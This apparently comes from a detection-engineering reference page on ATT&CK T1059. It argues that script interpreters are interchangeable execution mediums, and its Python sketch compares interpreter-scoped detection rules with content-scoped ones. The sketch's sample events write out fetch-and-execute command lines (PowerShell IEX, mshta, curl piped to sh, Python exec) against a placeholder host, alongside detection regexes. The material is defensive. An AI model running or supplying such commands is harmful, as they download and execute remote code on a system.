Command and Scripting Interpreter
Execute attacker-controlled code via an interpreter available on the target system.
Why this is reclassified
The entries listed as sub-techniques of T1059 (PowerShell, Bash, Python, VBScript, etc.) are Execution Mediums, not sub-techniques. An Execution Medium defines how a technique is triggered, that is, the channel through which it is carried out. It is orthogonal to the technique itself: the same code execution can be triggered through any of these Execution Mediums, and switching Execution Medium does not change the technique being performed. Execution Medium–based detection rules have a hard ceiling of STP 3 because the attacker can switch Execution Medium while performing the same technique. These interpreters should be modelled in the Execution Medium dimension rather than as sub-techniques.
Medium
The interpreter used (PowerShell, Bash, Python, cmd.exe, etc.) is the Execution Medium, not the sub-technique. Detection rules scoped to a specific Execution Medium have a hard STP 3 ceiling.
Detect
Rules scoped to a specific interpreter have a hard STP 3 ceiling — the attacker switches Execution Medium. Rules targeting command content across all interpreters approach STP 5.
Target process.cmd_line content for suspicious patterns across all interpreter processes rather than filtering by process.file.path.
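As an added example (not part of the original page), the Python sketch below contrasts a rule that filters on process.file.path with one that matches process.cmd_line content across all interpreter processes. The events, the two content patterns and the example.invalid URLs are constructed for illustration and are assumptions, not a tuned rule set.

```python
import ntpath
import re

# Illustrative content patterns (assumptions), evaluated against
# process.cmd_line for every process, whichever interpreter carries it.
CONTENT_PATTERNS = {
    "remote_script_url": re.compile(r"https?://\S+\.(?:hta|ps1|vbs|js|sh|py)\b", re.I),
    "fetch_and_execute": re.compile(
        r"(?=.*https?://)(?=.*(?:\biex\b|invoke-expression|\bexec\s*\(|\|\s*(?:ba)?sh\b))",
        re.I),
}

def event(path, cmd_line):
    """Build a minimal process event with the two fields the rules read."""
    return {"process": {"file": {"path": path}, "cmd_line": cmd_line}}

# Constructed sample events: the same behaviour through four mediums,
# followed by one routine PowerShell job.
EVENTS = [
    event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoProfile -Command IEX (New-Object Net.WebClient)"
          ".DownloadString('http://example.invalid/stage')"),
    event(r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/stage.hta"),
    event("/usr/bin/bash", "bash -c 'curl -s http://example.invalid/stage | sh'"),
    event("/usr/bin/python3", "python3 -c 'import urllib.request as u; "
          "exec(u.urlopen(\"http://example.invalid/stage\").read())'"),
    event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]

def interpreter_scoped(ev):
    """Medium-scoped rule: fires on one interpreter path, whatever it runs."""
    return ntpath.basename(ev["process"]["file"]["path"]).lower() == "powershell.exe"

def content_scoped(ev):
    """Content rule: names of patterns matching cmd_line, for any process."""
    cmd = ev["process"]["cmd_line"]
    return [name for name, rx in CONTENT_PATTERNS.items() if rx.search(cmd)]

if __name__ == "__main__":
    for ev in EVENTS:
        print(f'{ntpath.basename(ev["process"]["file"]["path"]):<16}'
              f'interpreter_rule={interpreter_scoped(ev)!s:<6}'
              f'content_rule={content_scoped(ev)}')
```

The interpreter-scoped rule fires on both PowerShell events, including the routine backup job, and misses the mshta, Bash and Python variants; the content rule fires on all four variants and stays silent on the backup job.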
Mitigate
Blocking specific interpreters is STP 3 — the attacker switches Execution Medium. Application allowlisting operates closer to the technique level.
Application allowlisting (WDAC, AppLocker) is higher STP than blocking specific interpreters.
Seen in the wild
Gamaredon's GammaWorm uses VBScript while GammaLoad layers PowerShell and bitsadmin — the persistence technique is unchanged across all three; only the Execution Medium differs.
ClickFix lures victims into running PowerShell or mshta.exe via the Windows Run dialog — Execution Medium is attacker-chosen and interchangeable, illustrating the reclassification of T1059 from technique to medium dimension.